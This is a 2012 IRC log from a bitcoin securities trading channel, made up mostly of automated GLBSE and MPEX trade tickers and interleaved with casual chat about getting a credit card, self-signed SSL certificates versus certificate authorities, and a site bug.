? anyone see him ? Aug 23 17:59:45 it says this program is used by Python's os.popen function to work around a limitation in windows 95/98. It is not designed to be used as a stand-alone program Aug 23 18:00:06 oh ? Aug 23 18:00:13 omg i've been duped! Aug 23 18:00:34 so do you want to install python or do you want to learn to do this by hand ? Aug 23 18:01:24 (neither is very difficult) Aug 23 18:01:32 ;;tell nefario fix https://glbse.com/api/live/asset_ba/OBSI.ABMO Aug 23 18:01:32 Error: I haven't seen nefario, I'll let you do the telling. Aug 23 18:01:34 the easiest and most painfree way xD Aug 23 18:01:41 ;;tell nefario1 fix https://glbse.com/api/live/asset_ba/OBSI.ABMO Aug 23 18:01:42 Error: I haven't seen nefario1, I'll let you do the telling. Aug 23 18:01:46 fuck you gribble Aug 23 18:01:49 wtf ?! Aug 23 18:01:56 later tell Aug 23 18:01:57 noobs. Aug 23 18:02:19 mircea_popescu? Aug 23 18:02:27 ;;later tell Diablo-D3 it's later tell not tell Aug 23 18:02:27 The operation succeeded. Aug 23 18:02:38 ;;later tell nefario fix https://glbse.com/api/live/asset_ba/OBSI.ABMO Aug 23 18:02:39 The operation succeeded. Aug 23 18:02:44 ;;later tell nefario1 fix https://glbse.com/api/live/asset_ba/OBSI.ABMO Aug 23 18:02:44 The operation succeeded. Aug 23 18:03:19 anyhow, going to bed Aug 23 18:03:20 night all Aug 23 18:03:37 [GLBSE] [ASICMINER] 4 @ 0.0989999 = 0.396 BTC [+] Aug 23 18:04:48 [GLBSE] [OBSI.HRPT] 4 @ 0.10495 = 0.4198 BTC [+] Aug 23 18:05:31 [MPEX] [S.MPOE] 5700 @ 0.00038996 = 2.2228 BTC [-] Aug 23 18:06:44 Azelphur 2.7 or 3.2 ? Aug 23 18:06:56 2.7 Aug 23 18:07:42 ty Aug 23 18:07:58 mebbe put a mention in readme ? Aug 23 18:11:48 so, someone generated mtgox code like 12 hrs ago and didnt use it :| Aug 23 18:15:15 i punched a monkey in the face. he didn't even do anything wrong Aug 23 18:15:21 it was just t show the other monkeys i was serious Aug 23 18:15:25 that monkey was my FRIEND Aug 23 18:16:21 [GLBSE] [OBSI.HRPT] 10 @ 0.10495 = 1.0495 BTC [+] Aug 23 18:16:58 its from a tv show Aug 23 18:17:00 i didn't really hit a monkey Aug 23 18:18:05 got rejected for a credit card today \m/ Aug 23 18:18:36 nice Aug 23 18:18:42 counts as a hard query on your credit report too Aug 23 18:18:46 making you less likely to get another card Aug 23 18:18:52 you're doomed. Aug 23 18:18:58 your landlord will trash your lease now Aug 23 18:19:05 [GLBSE] [ASICMINER] 10 @ 0.0989999 = 0.99 BTC [+] Aug 23 18:19:12 and i think there was a study that most likely reason for gfs dumping blokes Aug 23 18:19:15 is cc rejection. Aug 23 18:19:52 woot Aug 23 18:20:05 mircea_popescu: I don't have a gf or a landlord, the studies must be true! Aug 23 18:20:10 lmao Aug 23 18:20:12 magic! Aug 23 18:20:34 [GLBSE] [GIGAMINING] 6 @ 0.9872 = 5.9232 BTC [-] Aug 23 18:20:51 dispute the inquiry Aug 23 18:21:13 exahash: I wasn't particularly expecting to get it baring in mind I'm unemployed and wanted a rewards card lol Aug 23 18:21:24 I also have no credit score (never taken out credit before) Aug 23 18:21:42 check out creditboards.com - there are loads of tricks, you just have to have the time Aug 23 18:21:56 yeah like Aug 23 18:21:58 paying your bills Aug 23 18:22:01 and getting good credit Aug 23 18:22:16 Azelphur: you'll have to get a shitty credit card to start Aug 23 18:22:18 funny enough I actually pay bills, they just don't show up on my credit check Aug 23 18:22:23 like the UK equiv of Capital One Aug 23 18:22:36 or if they have that, they offer some really awful credit cards Aug 23 18:22:38 rg: the uk equiv of capital one is capital one, that's what I got recommended to try next haha Aug 23 18:22:54 a secured capital one card to build my rating up \o/ Aug 23 18:24:31 not sure about the UK, but here store cards are easier to get Aug 23 18:25:04 [GLBSE] [BDT] 1 @ 1.09 BTC [+] Aug 23 18:25:12 you use them carefully for a while to get your rating, then go for a "real" card Aug 23 18:25:19 I have to wait like 2-3 months before applying again not to damage my rating though \o/ Aug 23 18:25:22 exahash: indeed Aug 23 18:27:24 [MPEX] [S.MPOE] 2491 @ 0.00039028 = 0.9722 BTC [+] Aug 23 18:28:54 my credit check is real assy though, it doesn't show the bills I pay, it says all my bank balances are 0, and apparently being 22 is a point against me getting a card \o/ Aug 23 18:30:05 i only ever had debit cards. Aug 23 18:30:47 figured I should get one since I buy shit online all the time it'd be good to have the fraud protections that come from having a CC Aug 23 18:31:30 [GLBSE] [BITNODES] 2 @ 0.2577 = 0.5154 BTC [-] Aug 23 18:33:24 [GLBSE] [HYDRO.BONDS] 1 @ 1.6799 BTC [+] Aug 23 18:35:10 !ticker S.MPOE Aug 23 18:35:11 [MPEX:S.MPOE] 1day: 0.00038896 / 0.00039208 / 0.0004 (1405000 shares, 550.88 BTC), 30day: 0.0001 / 0.00036658 / 0.00041457 (60016478 shares, 22,001.21 BTC) Aug 23 18:35:14 [GLBSE] [NASTY] 1 @ 0.66 BTC [+] Aug 23 18:38:53 [GLBSE] [BITNODES] 6 @ 0.258 = 1.548 BTC [+] Aug 23 18:39:09 [GLBSE] [GIGAMINING] 4 @ 0.9801 = 3.9204 BTC [-] Aug 23 18:39:10 [GLBSE] [GIGAMINING] 15 @ 0.98 = 14.7 BTC [-] Aug 23 18:39:11 [GLBSE] [GIGAMINING] 1 @ 0.97500001 BTC [-] Aug 23 18:39:12 [GLBSE] [GIGAMINING] 1 @ 0.975 BTC [-] Aug 23 18:40:16 [GLBSE] [NASTY] 1 @ 0.67 BTC [+] Aug 23 18:41:41 [GLBSE] [GIGAMINING] 1 @ 0.985 BTC [+] Aug 23 18:41:50 [GLBSE] [CIUCIU.BOND] 30 @ 0.1 = 3 BTC [+] Aug 23 18:42:14 [GLBSE] [TICKER] 2 @ 0.46 = 0.92 BTC [+] Aug 23 18:43:00 [MPEX] [S.MPOE] 7500 @ 0.00039145 = 2.9359 BTC [+] Aug 23 18:49:32 [GLBSE] [PGM] 1 @ 0.25 BTC [+] Aug 23 18:55:41 [GLBSE] [YABMC] 15 @ 0.1161 = 1.7415 BTC [-] Aug 23 18:55:42 [GLBSE] [YABMC] 5 @ 0.116 = 0.58 BTC [-] Aug 23 18:55:44 [GLBSE] [YABMC] 10 @ 0.1151 = 1.151 BTC [-] Aug 23 18:56:21 cuicui what's your bond Aug 23 18:56:27 is it mining? Aug 23 18:56:36 [GLBSE] [GIGAMINING] 3 @ 0.9849 = 2.9547 BTC [-] Aug 23 18:57:01 [GLBSE] [YABMC] 2 @ 0.114 = 0.228 BTC [-] Aug 23 18:59:37 [GLBSE] [YABMC] 15 @ 0.1141 = 1.7115 BTC [+] Aug 23 18:59:39 [GLBSE] [YABMC] 5 @ 0.114 = 0.57 BTC [-] Aug 23 19:00:18 [GLBSE] [GIGAMINING] 3 @ 0.985 = 2.955 BTC [+] Aug 23 19:05:58 [GLBSE] [ASICMINER] 2 @ 0.0989999 = 0.198 BTC [+] Aug 23 19:11:44 [MPEX] [S.MPOE] 51507 @ 0.00039085 = 20.1315 BTC [-] Aug 23 19:11:46 [MPEX] [S.MPOE] 5583 @ 0.00038996 = 2.1771 BTC [-] Aug 23 19:11:47 [MPEX] [S.MPOE] 6310 @ 0.00038961 = 2.4584 BTC [-] Aug 23 19:14:16 [MPEX] [S.MPOE] 2693 @ 0.00039145 = 1.0542 BTC [+] Aug 23 19:16:12 sweet jesus Aug 23 19:16:20 i just found 2 boxes of strawberry cereal bars Aug 23 19:16:27 and then i remembered they're mine Aug 23 19:16:33 Congratulations, We've approved your application for a Capital One Secured Card Aug 23 19:16:34 woot \o/ Aug 23 19:16:44 oh Aug 23 19:16:45 secured card Aug 23 19:16:46 that's lame Aug 23 19:16:53 indeed, but it's a start Aug 23 19:16:57 you gotta give them your money Aug 23 19:17:00 and they let you spend it Aug 23 19:17:07 yea haha Aug 23 19:17:16 you shoulda got the amex prepaid Aug 23 19:17:16 I have to do that anyway since I have a debit card Aug 23 19:17:20 sometimes they invite you to get a real amex Aug 23 19:17:26 after you do a good job Aug 23 19:17:28 rg: I wanna build my credit score Aug 23 19:17:36 amex will raise your credit score Aug 23 19:17:50 and youll have an american exrpess card Aug 23 19:17:52 congrats Azelphur Aug 23 19:17:56 you can flash it at girlies Aug 23 19:18:01 rg: keyword american xD Aug 23 19:18:03 and be like hey i got good credit Aug 23 19:18:12 pff you can get amex in UK Aug 23 19:18:21 lies :o Aug 23 19:18:39 http://www.americanexpress.com/uk/content/information.html Aug 23 19:18:47 but yea I don't really care too much, I'll use this thing for a year for general shopping / online purchases to build up a score Aug 23 19:18:51 then go for the 3% cashback again Aug 23 19:19:14 not like I'mma be paying interest on it or anything since I'll be paying it off at the end of every month Aug 23 19:19:43 [MPEX] [F.GIGA.ETF] 8212 @ 0.00103015 = 8.4596 BTC [-] Aug 23 19:19:45 [MPEX] [F.GIGA.ETF] 908 @ 0.00102973 = 0.935 BTC [-] Aug 23 19:22:51 You can get AmEx in the UK, but a surprisingly large number of places don't take it Aug 23 19:23:16 Indeed, it was apparently a news story today that Tom Cruise went to get a curry and couldn't pay with AmEx Aug 23 19:23:24 The UK, ladies and gentlemen Aug 23 19:25:51 most americans take payment systems for granted. they're not aware of how things differ internationally Aug 23 19:27:25 [MPEX] [S.MPOE] 14390 @ 0.00038961 = 5.6065 BTC [-] Aug 23 19:27:27 [MPEX] [S.MPOE] 36200 @ 0.00038953 = 14.101 BTC [-] Aug 23 19:27:28 [MPEX] [S.MPOE] 8545 @ 0.00038949 = 3.3282 BTC [-] Aug 23 19:28:17 [GLBSE] [OBSI.1MHS] 10 @ 0.09876543 = 0.9877 BTC [-] Aug 23 19:29:06 [GLBSE] [OBSI.HRPT] 5 @ 0.10495 = 0.5248 BTC [+] Aug 23 19:33:47 [GLBSE] [ASICMINER] 1 @ 0.0989999 BTC [+] Aug 23 19:35:36 [MPEX] [S.MPOE] 6950 @ 0.00039145 = 2.7206 BTC [+] Aug 23 19:35:37 [MPEX] [S.MPOE] 11400 @ 0.00039284 = 4.4784 BTC [+] Aug 23 19:35:38 [MPEX] [S.MPOE] 9250 @ 0.00039295 = 3.6348 BTC [+] Aug 23 19:38:37 [GLBSE] [ASICMINER] 10 @ 0.0989999 = 0.99 BTC [+] Aug 23 19:39:52 [MPEX] [F.GIGA.ETF] 1754 @ 0.00102235 = 1.7932 BTC [-] Aug 23 19:39:54 [MPEX] [F.GIGA.ETF] 5142 @ 0.0010206 = 5.2479 BTC [-] Aug 23 19:39:55 [MPEX] [F.GIGA.ETF] 1784 @ 0.0010114 = 1.8043 BTC [-] Aug 23 19:39:56 [MPEX] [F.GIGA.ETF] 6120 @ 0.00100488 = 6.1499 BTC [-] Aug 23 19:40:50 [GLBSE] [PPT.B] 5 @ 1.01 = 5.05 BTC [-] Aug 23 19:41:36 [GLBSE] [PUREMINING] 15 @ 0.1101 = 1.6515 BTC [+] Aug 23 19:41:37 [GLBSE] [PUREMINING] 20 @ 0.11 = 2.2 BTC [-] Aug 23 19:41:39 [GLBSE] [PUREMINING] 1 @ 0.105 BTC [-] Aug 23 19:41:40 [GLBSE] [PUREMINING] 6 @ 0.1 = 0.6 BTC [-] Aug 23 19:41:40 [GLBSE] [PUREMINING] 50 @ 0.093 = 4.65 BTC [-] Aug 23 19:41:41 [GLBSE] [PUREMINING] 50 @ 0.092 = 4.6 BTC [-] Aug 23 19:41:43 [GLBSE] [PUREMINING] 16 @ 0.0914 = 1.4624 BTC [-] Aug 23 19:41:44 [GLBSE] [PUREMINING] 4 @ 0.09120002 = 0.3648 BTC [-] Aug 23 19:41:45 [GLBSE] [PUREMINING] 10 @ 0.091 = 0.91 BTC [-] Aug 23 19:42:13 [GLBSE] [BIB.PIRATE] 1 @ 0.6502 BTC [+] Aug 23 19:42:15 [GLBSE] [BIB.PIRATE] 2 @ 0.65002 = 1.3 BTC [-] Aug 23 19:42:16 [GLBSE] [BIB.PIRATE] 9 @ 0.65 = 5.85 BTC [-] Aug 23 19:42:36 [GLBSE] [TEEK.USD] 1 @ 0.08999 BTC [+] Aug 23 19:42:53 [GLBSE] [PPT.B] 1 @ 1.01 BTC [-] Aug 23 19:43:55 [GLBSE] [TYGRR.BOND-P] 4 @ 0.6799 = 2.7196 BTC [+] Aug 23 19:43:56 [GLBSE] [TYGRR.BOND-P] 16 @ 0.68 = 10.88 BTC [+] Aug 23 19:44:02 [GLBSE] [FOO.PPPPT] 2 @ 0.6501 = 1.3002 BTC [-] Aug 23 19:44:04 [GLBSE] [FOO.PPPPT] 9 @ 0.65 = 5.85 BTC [-] Aug 23 19:44:05 [GLBSE] [FOO.PPPPT] 5 @ 0.625 = 3.125 BTC [-] Aug 23 19:44:22 [MPEX] [S.MPOE] 11881 @ 0.00038949 = 4.6275 BTC [-] Aug 23 19:44:24 [MPEX] [S.MPOE] 13700 @ 0.00038938 = 5.3345 BTC [-] Aug 23 19:44:24 [MPEX] [S.MPOE] 19 @ 0.00038904 = 0.0074 BTC [-] Aug 23 19:46:13 [MPEX] [S.MPOE] 6081 @ 0.00038904 = 2.3658 BTC [-] Aug 23 19:46:14 [MPEX] [S.MPOE] 11701 @ 0.00038896 = 4.5512 BTC [-] Aug 23 19:46:15 [MPEX] [S.MPOE] 3600 @ 0.00038892 = 1.4001 BTC [-] Aug 23 19:46:22 [GLBSE] [TYGRR.BOND-P] 5 @ 0.65 = 3.25 BTC [-] Aug 23 19:48:11 [GLBSE] [TYGRR.BOND-P] 1 @ 0.65 BTC [-] Aug 23 19:52:36 [MPEX] [F.GIGA.ETF] 1380 @ 0.00102656 = 1.4167 BTC [+] Aug 23 19:54:34 [MPEX] [S.MPOE] 34700 @ 0.00038874 = 13.4893 BTC [-] Aug 23 19:55:39 [MPEX] [F.GIGA.ETF] 2400 @ 0.00104221 = 2.5013 BTC [+] Aug 23 19:56:03 [GLBSE] [DMC] 13 @ 0.049 = 0.637 BTC [-] Aug 23 19:57:56 [GLBSE] [DMC] 1 @ 0.049 BTC [-] Aug 23 20:00:59 [GLBSE] [ASICMINER] 7 @ 0.0989999 = 0.693 BTC [+] Aug 23 20:03:15 [GLBSE] [ASICMINER] 25 @ 0.0989999 = 2.475 BTC [+] Aug 23 20:13:49 [GLBSE] [NYAN.A] 5 @ 1 = 5 BTC [-] Aug 23 20:16:16 [MPEX] [S.MPOE] 24200 @ 0.00038874 = 9.4075 BTC [-] Aug 23 20:16:18 [MPEX] [S.MPOE] 15600 @ 0.00038874 = 6.0643 BTC [-] Aug 23 20:21:14 [GLBSE] [KRAKEN] 3 @ 0.01 = 0.03 BTC Aug 23 20:22:40 [GLBSE] [MOORE] 1 @ 0.50000001 BTC [+] Aug 23 20:22:42 [GLBSE] [MOORE] 25 @ 0.5 = 12.5 BTC [-] Aug 23 20:24:12 [MPEX] [S.MPOE] 34400 @ 0.00038874 = 13.3727 BTC [-] Aug 23 20:24:13 [MPEX] [S.MPOE] 28017 @ 0.0003885 = 10.8846 BTC [-] Aug 23 20:29:13 [GLBSE] [BITBOND] 1 @ 0.4599 BTC [+] Aug 23 20:29:14 [GLBSE] [BITBOND] 1 @ 0.46 BTC [+] Aug 23 20:30:47 [GLBSE] [JAH] 1 @ 0.1799999 BTC [-] Aug 23 20:30:49 [GLBSE] [JAH] 1 @ 0.18 BTC [+] Aug 23 20:32:33 [GLBSE] [YABMC] 1 @ 0.129099 BTC [+] Aug 23 20:40:40 [GLBSE] [FPGAMINING] 1 @ 0.91 BTC [-] Aug 23 20:40:41 [GLBSE] [FPGAMINING] 1 @ 0.89 BTC [-] Aug 23 20:46:28 [MPEX] [F.GIGA.ETF] 5320 @ 0.00103794 = 5.5218 BTC [-] Aug 23 20:48:08 [GLBSE] [FOO.PPPPT] 2 @ 0.6501 = 1.3002 BTC [+] Aug 23 20:48:09 [GLBSE] [FOO.PPPPT] 2 @ 0.65 = 1.3 BTC [-] Aug 23 20:50:25 [GLBSE] [FPGAMINING] 1 @ 0.8899 BTC [-] Aug 23 20:51:11 [GLBSE] [BTC-MINING] 1 @ 0.98998999 BTC [+] Aug 23 20:53:15 [GLBSE] [PUREMINING] 3 @ 0.12979999 = 0.3894 BTC [+] Aug 23 20:53:46 [GLBSE] [OBSI.HRPT] 2 @ 0.10495 = 0.2099 BTC [+] Aug 23 20:57:00 [MPEX] [S.MPOE] 7100 @ 0.0003885 = 2.7584 BTC [-] Aug 23 20:57:33 [GLBSE] [FOO.PPPPT] 1 @ 0.74 BTC [+] Aug 23 20:57:35 [GLBSE] [FOO.PPPPT] 4 @ 0.7479 = 2.9916 BTC [+] Aug 23 20:57:35 [GLBSE] [FOO.PPPPT] 3 @ 0.748 = 2.244 BTC [+] Aug 23 20:57:36 [GLBSE] [FOO.PPPPT] 10 @ 0.749 = 7.49 BTC [+] Aug 23 20:57:38 [GLBSE] [FOO.PPPPT] 2 @ 0.75 = 1.5 BTC [+] Aug 23 20:58:30 [GLBSE] [BIB.PIRATE] 4 @ 0.7497 = 2.9988 BTC [+] Aug 23 20:58:31 [GLBSE] [BIB.PIRATE] 3 @ 0.7498 = 2.2494 BTC [+] Aug 23 20:58:33 [GLBSE] [BIB.PIRATE] 10 @ 0.75 = 7.5 BTC [+] Aug 23 21:01:30 [GLBSE] [ASICMINER] 17 @ 0.0989999 = 1.683 BTC [+] Aug 23 21:02:13 [MPEX] [S.MPOE] 6018 @ 0.00038877 = 2.3396 BTC [+] Aug 23 21:02:15 [MPEX] [S.MPOE] 25700 @ 0.00039173 = 10.0675 BTC [+] Aug 23 21:03:26 [GLBSE] [FOO.PPPPT] 2 @ 0.6501 = 1.3002 BTC [-] Aug 23 21:03:28 [GLBSE] [FOO.PPPPT] 4 @ 0.65 = 2.6 BTC [-] Aug 23 21:04:40 [GLBSE] [GIGAMINING] 1 @ 0.9849 BTC [-] Aug 23 21:05:26 [GLBSE] [GIGAMINING] 20 @ 0.985 = 19.7 BTC [+] Aug 23 21:05:42 [GLBSE] [BDT] 1 @ 1.09 BTC [+] Aug 23 21:06:29 [GLBSE] [BBBB] 1200 @ 0.00028 = 0.336 BTC [+] Aug 23 21:08:00 [GLBSE] [PUREMINING] 6 @ 0.12979999 = 0.7788 BTC [+] Aug 23 21:10:11 [GLBSE] [OBSI.HRPT] 1 @ 0.10495 BTC [+] Aug 23 21:12:52 [MPEX] [S.MPOE] 19382 @ 0.0003918 = 7.5939 BTC [+] Aug 23 21:12:53 [MPEX] [S.MPOE] 14883 @ 0.0003885 = 5.782 BTC [-] Aug 23 21:12:55 [MPEX] [S.MPOE] 25476 @ 0.00038848 = 9.8969 BTC [-] Aug 23 21:13:10 diablo https://glbse.com/api/live/asset_ba/OBSI.ABMO Aug 23 21:13:11 [GLBSE] [CBGB] 1 @ 0.5 BTC [+] Aug 23 21:13:12 fixed Aug 23 21:15:42 [GLBSE] [TYGRR.BOND-A] 80 @ 0.1 = 8 BTC [+] Aug 23 21:21:42 hey rg, are you about? Aug 23 21:22:10 (actually, probably many people who frequent here could answer this) Aug 23 21:22:38 nefario, why do I often have to reload the page for the buy/sell form to show up? Aug 23 21:22:53 because I hate you all Aug 23 21:23:09 because of the request limit Aug 23 21:23:36 There's a request limit? Aug 23 21:24:03 I haven't looked into ssl all that much, but is it possible to use a self-signed cert and in place of a 'trusted third party' such as verisign, couldn't i sign something with my gpg identity that would provide the same info the trusted third party would? Aug 23 21:24:24 I don't think so... Aug 23 21:24:41 BTC-Mining: there is for the API Aug 23 21:24:48 then what sort of data does verisign provide to the browser? Aug 23 21:24:49 which is where the form is taken from Aug 23 21:25:16 is there really no way to make my own that people would trust to use on my site because it's signed by me? Aug 23 21:25:37 No, browser only recognize a few issuers because they're stupid Aug 23 21:26:12 this just sounds unbelievable Aug 23 21:26:26 that's entirely absurd Aug 23 21:26:30 smickles, you can make a 'self-signed certificate' Aug 23 21:26:45 people have to click a few extra buttons to accept it Aug 23 21:26:49 smickles: you understand the concept of chain of trust right? Aug 23 21:26:50 exahash: that's what i'm talking about, but how would the user know it's the correct key-pair Aug 23 21:26:56 for signing certs Aug 23 21:27:01 they don't Aug 23 21:27:16 self signed provides encryption only Aug 23 21:27:18 not authenticity Aug 23 21:27:27 exahash: yeah, i'm saying i should be able to gpg clearsign something that assures it is the correct key-pair Aug 23 21:27:40 Result? People only see the "trusted" when you use certificates from another party which might just end up giving main certificates which can overide all their customer's SSL certificates. Aug 23 21:28:37 you could tell them to inspect the cert and go verify that its fingerprint matches one you publish Aug 23 21:28:51 It happened before, issuers that issued a master certificate that were eventually leaked and could pretend to be any of their client's website afterward. Aug 23 21:29:00 nefario: https://glbse.com/asset/view/OBSI.ABMO Buy price next to buy button reads 0 when there are no bids, just tested. Aug 23 21:29:13 Also means SSL certificates are very expensive for some reason Aug 23 21:29:22 if you want that to happen automatically, you have to pay for one signed by a cert their browser already trusts Aug 23 21:29:23 [GLBSE] [TYGRR.BOND-P] 1 @ 0.64999997 BTC [-] Aug 23 21:29:56 Obsi: ja, thats the best price available for the asset Aug 23 21:30:12 google 'buy ssl certificate' and look at the prices in the ads Aug 23 21:30:16 Yeah I'd say that's the best price for any asset Aug 23 21:30:27 hmmm Aug 23 21:30:29 [GLBSE] [HYDRO.BONDS] 1 @ 1.6799 BTC [+] Aug 23 21:30:30 buy there are asks Aug 23 21:30:34 but the asks are available for 0.1 Aug 23 21:30:37 and they're not showing Aug 23 21:30:43 if I put in a bid it corrects self Aug 23 21:30:49 I'll have to look into this Aug 23 21:31:44 ssl is bonk then, there should be a way for a user to accept a self-signed cert and confidently know that it is the correct key-pair because they have a signed file wich points out that it is/isn't the proper key-pair being used Aug 23 21:32:39 oh my, that's the second time i've hilighted that one by accident Aug 23 21:34:03 smickles: the ssl business ensures thats not going to be the case Aug 23 21:34:27 the ssl ca's pay the browser makers to include their certs Aug 23 21:35:56 there may be a way to add to the default certs in some browsers, but I'm not aware of it Aug 23 21:36:03 ok, i think i have the best solution in mind, Aug 23 21:36:30 when you accept a self-signed cert, the browser gives you the chance to view the cert right? Aug 23 21:36:38 yes Aug 23 21:36:52 i can clearsign the data that the user would see in such a viewing Aug 23 21:37:02 [GLBSE] [GIGAMINING] 1 @ 0.984 BTC [-] Aug 23 21:37:29 would that be the best solution without actually using a CA? Aug 23 21:38:07 give me a sec, I'll go see what I see when I hit a self-signed cert Aug 23 21:38:09 that way a user could compare the cert's fingerprint Aug 23 21:38:24 [GLBSE] [BTCMC] 9 @ 0.59 = 5.31 BTC [+] Aug 23 21:38:26 [GLBSE] [BTCMC] 7 @ 0.56 = 3.92 BTC [-] Aug 23 21:38:27 [GLBSE] [BTCMC] 2 @ 0.5502 = 1.1004 BTC [-] Aug 23 21:38:28 [GLBSE] [BTCMC] 2 @ 0.5501 = 1.1002 BTC [-] Aug 23 21:38:29 with my clearsigned fingerprint, Aug 23 21:38:29 [GLBSE] [BTCMC] 34 @ 0.5 = 17 BTC [-] Aug 23 21:38:45 [GLBSE] [ASICMINER] 3 @ 0.0989999 = 0.297 BTC [+] Aug 23 21:39:18 then they can accept the cert, and at least firefox will remember it Aug 23 21:39:25 not sure about others Aug 23 21:39:36 I think chrome remembers till its restarted Aug 23 21:39:58 smickles Aug 23 21:40:02 why not just get a free SSL cert? Aug 23 21:40:13 a free, non self signed Aug 23 21:40:19 if there are free ssl certs, what's the point of CAs? Aug 23 21:41:55 exahash: i think you are correct there, i just want to present the informantion where by a user could trust the self-signed cert and know it was the correct on and not some kind of attacker Aug 23 21:42:57 if they veryify my clearsigned cert fingerprint, and the cert's fingerprint the browser is asking them to sign is not the same as that, they know it's fake Aug 23 21:42:59 cause they can still verify your identity Aug 23 21:43:01 and that you own the domain Aug 23 21:43:04 without charging you money Aug 23 21:43:06 or if my sig doesn't verify Aug 23 21:43:11 wow, just googled 'free ssl cert' Aug 23 21:43:20 dont go anywhere you found in google Aug 23 21:43:23 just go to startssl.com Aug 23 21:43:25 didn't know you could get more than just a trial one for free Aug 23 21:43:27 that's who i use Aug 23 21:43:31 theyre ok Aug 23 21:43:56 [GLBSE] [BITCOINMINV] 10 @ 0.127 = 1.27 BTC [+] Aug 23 21:44:31 paid for a *.glbse.com cert Aug 23 21:44:39 worth it imo Aug 23 21:44:54 to get rid of those fucking warning messages Aug 23 21:45:01 it's like Aug 23 21:45:03 extortion Aug 23 21:45:06 pay us Aug 23 21:45:07 also, i like the idea of being able to get both parts of ssl without having to appeal to an authority like a fucking slave Aug 23 21:45:19 there is that Aug 23 21:45:24 but I jsut feel its extortion Aug 23 21:45:57 I Aug 23 21:45:58 M Aug 23 21:46:01 AM Aug 23 21:46:07 melting Aug 23 21:46:23 Ive finally got the updates for GLBSE done Aug 23 21:46:26 but am too tired to roll them out Aug 23 21:46:30 fuck Aug 23 21:47:53 relax nef its okay Aug 23 21:48:00 we can wait until monday :) Aug 23 21:48:16 no it's ready Aug 23 21:48:20 tje reserve related update? Aug 23 21:48:23 *the? Aug 23 21:48:25 but im not rolling it out and going to bed Aug 23 21:48:27 smickles: ja Aug 23 21:48:28 what's wrong with Friday, usagi? Aug 23 21:48:52 nefario, are there a lot of undocumented/unadvertised api commands? Aug 23 21:48:54 lol, roll out, roll into bed, shit hits fan Aug 23 21:48:56 gotta get down on friday Aug 23 21:49:04 exahash: no just a couple Aug 23 21:49:08 k, thx Aug 23 21:49:16 smickles: exactly Aug 23 21:50:14 in chrome i see a place where i can import a cert Aug 23 21:50:41 do you thik it could work if i signed a cert and said, hey, import this to trust me Aug 23 21:51:17 gotta have a bowl, gotta have cereal Aug 23 21:54:14 everybody's looking forward to the weekend. Aug 23 21:56:58 usagi: hows the milk where you are Aug 23 21:57:26 @smickles, yeah, that could work, not sure what you're using it for, or how smart your users are Aug 23 21:57:34 we can get skim milk, whole milk, nut milk, soy milk, chocolate milk, banana milk, malted milk, strawberry milk, the list goes on Aug 23 21:57:52 usagi: I didn't ask that, I asked how it was? Aug 23 21:57:57 the milk here is utter piss Aug 23 21:58:03 white painty water Aug 23 21:58:11 it's good milk Aug 23 21:58:12 there is no fresh milk Aug 23 21:58:16 it makes me cry Aug 23 21:58:36 if you really wanna cry check this out https://www.youtube.com/watch?v=xgOcvLZ-Nh0 Aug 23 21:58:42 [GLBSE] [PPT.DIV] 2 @ 0.282 = 0.564 BTC [+] Aug 23 21:58:47 usagi: I can't Aug 23 21:58:50 in china Aug 23 21:58:56 no useful websites allowed Aug 23 21:59:01 oh dear, my eyes hurt usagi! Aug 23 21:59:04 they're even fucking with google.co.uk now Aug 23 21:59:52 exhash maybe this will help: https://www.youtube.com/watch?v=zaONHJZb9-Y Aug 23 21:59:59 I hate this place Aug 23 22:00:08 you're mean Aug 23 22:00:45 at least gangnam style was funny Aug 23 22:00:48 I mean china Aug 23 22:01:02 http://www.youtube.com/watch?v=9bZkp7q19f0 Aug 23 22:01:04 usagi: fucking lol on that b9-Y video, it gave me "THE HULK" for an add Aug 23 22:01:12 *ad Aug 23 22:02:14 exahash: we'll see how it works out, i suppose, I shoud probably do a nice infographic instruction Aug 23 22:02:31 its a sick world Aug 23 22:02:45 smickles, thats a lot more work than grabbing a free startssl cert Aug 23 22:04:58 smickles: this one will make you want to kill yourself https://www.youtube.com/watch?v=8I2An1WCzAI Aug 23 22:05:57 [GLBSE] [FOO.PPPPT] 1 @ 0.65 BTC [-] Aug 23 22:06:23 exahash: well, as that may be true, I think this solution would be better. The user would actually be making a decision about trusting my site based on wether or not they trust me rather than someone paid off the browser-maker and charged a fee, claiming to have fact-checked the site's owner Aug 23 22:08:28 smickles, ok, makese sense to me, especially since I don't know your site or your users Aug 23 22:10:04 exahash: no site an just a few users right now. Thanks for you input to my query :D Aug 23 22:10:57 List of commands: Aug 23 22:10:58 !ticker (desc: returns current GLBSE/MPEX ticker values) Aug 23 22:10:59 !pl [@] [] (desc: profit loss calc for GLBSE assets) Aug 23 22:11:09 [GLBSE] [OBSI.HRPT] 100 @ 0.10495 = 10.495 BTC [+] Aug 23 22:12:45 !ticker gigamining Aug 23 22:12:48 [GLBSE:GIGAMINING] [Bid: 0.98] [Ask: 0.984] [Spread: 0.004] [Last: 0.984] [24hVol: 125.75120001] [7dAvg: 0.99799596] Aug 23 22:14:07 [GLBSE:YABMC] [Bid: 0.114] [Ask: 0.1289] [Spread: 0.0149] [Last: 0.129099] [24hVol: 25.368898] [7dAvg: 0.12090116] Aug 23 22:20:45 hey ciuciu Aug 23 22:20:47 on thing Aug 23 22:20:51 *one Aug 23 22:21:31 you know that in order to have a .us domain name as a foreiner, you need a 'bona fide' presence in 'merica, right? Aug 23 22:21:51 so why do you think that polimedia.us is registered with a fake name, Aug 23 22:21:58 rather than an agent? Aug 23 22:22:37 ya know, the same way many businesses incorporate in delaware Aug 23 22:23:01 one other thing, Aug 23 22:23:11 do you think 4chan is a porn site too? Aug 23 22:24:00 (and i kow tha m00t isn't trying to run a cryptocurrency exchange) Aug 23 22:31:09 [MPEX] [S.MPOE] 3459 @ 0.00038848 = 1.3438 BTC [-] Aug 23 22:31:11 [MPEX] [S.MPOE] 19348 @ 0.00038847 = 7.5161 BTC [-] Aug 23 22:36:50 [GLBSE] [PPT.DIV] 13 @ 0.282 = 3.666 BTC [+] Aug 23 22:39:36 [GLBSE] [PPT.B] 23 @ 1.01 = 23.23 BTC [-] Aug 23 22:45:24 [GLBSE] [V.HRL] 4 @ 1 = 4 BTC Aug 23 22:47:57 [GLBSE] [GIGAMINING] 2 @ 0.9839 = 1.9678 BTC [-] Aug 23 22:49:25 [GLBSE] [KRAKEN] 150 @ 0.01 = 1.5 BTC Aug 23 22:52:14 [GLBSE] [BTC-MINING] 2 @ 0.98998999 = 1.98 BTC [+] Aug 23 22:56:52 [GLBSE] [FOO.PPPPT] 2 @ 0.7399 = 1.4798 BTC [+] Aug 23 